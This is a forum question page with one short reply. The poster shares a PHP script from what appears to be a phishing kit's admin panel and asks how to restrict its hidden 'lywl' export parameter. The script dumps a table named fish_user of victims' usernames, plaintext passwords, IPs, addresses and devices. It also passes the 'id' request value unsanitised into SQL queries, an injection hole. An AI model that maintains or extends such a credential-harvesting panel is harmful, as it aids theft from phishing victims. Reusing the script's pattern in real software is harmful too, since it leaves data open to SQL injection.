Wie kann ich verhindern, dass normale Administratoren Daten über dcsja.php?lywl exportieren?
yz666
yz666 2019-08-02 23:06:16
0
1
996
<?php
include("ip.php");
?>
<?php
require_once '../include/common.php';
if($islogin==1){}else exit("<script language='javascript'>window.location.href='./login.php';</script>");
if(isset($_GET['lywl'])){
$sql="select * from fish_user;";
$update="update fish_user set output=1;";
}else{
$zhi=$_GET['id'];
if($zhi==''){
exit('错误请勿使用链接导出!');
}
$sql="select * from fish_user where id in($zhi);";
$update="update fish_user set output=1 where id in($zhi);";
}
$filename=date("Y-m-d").'-Data.txt';//要导出的文件的文件名需要加上文件后缀
header('Content-Type: text/x-sql');
header('Expires: ' . gmdate('D, d M Y H:i:s') . ' GMT');
header('Content-Disposition: attachment; filename="' .$filename. '"');
$is_ie = 'IE';
   if ($is_ie == 'IE') {
       header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
       header('Pragma: public');
} else {
       header('Pragma: no-cache');
       header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
   }
$data=$DB->query($sql);
$DB->query($update);
$date = date("Y-m-d H:i:s");
echo $date." 导出的数据\r\n";
while($row = $DB->fetch($data))
  {
  echo $row['username'] . "----" . $row['password'] . "----" . $row['ip'] . "----" . $row['address'] . "----" . $row['time']. $row['device']. "----" . $row['bianhao'];
  echo "\r\n";
  }
exit();
?>


yz666
yz666

学习学习

Antworte allen(1)
像风一样自由

不太理解你的问题是什么,我看程序里不是已经写了判断lywl这个参数是否存在?

Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage